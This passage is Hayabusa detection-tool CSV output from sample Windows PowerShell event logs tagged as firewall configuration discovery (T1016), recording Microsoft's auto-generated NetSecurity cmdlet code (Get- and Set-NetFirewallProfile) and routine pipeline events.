[switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetFirewallProfile"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetFirewallProfile</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""Name""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByName"" IsMandatory=""true"" Position=""0"" Aliases=""Profile""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetFirewallRuleInProfile"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallRule""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleInProfile"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecRule""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetMainModeRuleInProfile"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecMainModeRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecMainModeRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""Enabled""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""Enabled""/> </Parameter> <Parameter ParameterName=""DefaultInboundAction""> <Type PSType=""NetSecurity.Action""/> <CmdletParameterMetadata PSName=""DefaultInboundAction""/> </Parameter> <Parameter ParameterName=""DefaultOutboundAction""> <Type PSType=""NetSecurity.Action""/> <CmdletParameterMetadata PSName=""DefaultOutboundAction""/> </Parameter> <Parameter ParameterName=""AllowInboundRules""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""AllowInboundRules""/> </Parameter> <Parameter ParameterName=""AllowLocalFirewallRules""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""AllowLocalFirewallRules""/> </Parameter> <Parameter ParameterName=""AllowLocalIPsecRules""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""AllowLocalIPsecRules""/> </Parameter> <Parameter ParameterName=""AllowUserApps""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""AllowUserApps""/> </Parameter> <Parameter ParameterName=""AllowUserPorts""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""AllowUserPorts""/> </Parameter> <Parameter ParameterName=""AllowUnicastResponseToMulticast""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""AllowUnicastResponseToMulticast""/> </Parameter> <Parameter ParameterName=""NotifyOnListen""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""NotifyOnListen""/> </Parameter> <Parameter ParameterName=""EnableStealthModeForIPsec""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""EnableStealthModeForIPsec""/> </Parameter> <Parameter ParameterName=""LogFileName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""LogFileName""/> </Parameter> <Parameter ParameterName=""LogMaxSizeKilobytes""> <Type PSType=""uint64""/> <CmdletParameterMetadata PSName=""LogMaxSizeKilobytes""/> </Parameter> <Parameter ParameterName=""LogAllowed""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""LogAllowed""/> </Parameter> <Parameter ParameterName=""LogBlocked""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""LogBlocked""/> </Parameter> <Parameter ParameterName=""LogIgnored""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""LogIgnored""/> </Parameter> <Parameter ParameterName=""DisabledInterfaceAliases""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""DisabledInterfaceAliases""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryableProperties> <Property PropertyName=""Name""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata Aliases=""Profile"" PSName=""Name"" Position=""0"" IsMandatory=""true"" CmdletParameterSets=""ByName""/> </RegularQuery> </Property> </QueryableProperties> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> </InstanceCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.GpoBoolean"" UnderlyingType=""uint16""> <Value Name=""False"" Value=""0""/> <Value Name=""True"" Value=""1""/> <Value Name=""NotConfigured"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.Action"" UnderlyingType=""uint16""> <Value Name=""NotConfigured"" Value=""0""/> <Value Name=""Allow"" Value=""2""/> <Value Name=""Block"" Value=""4""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
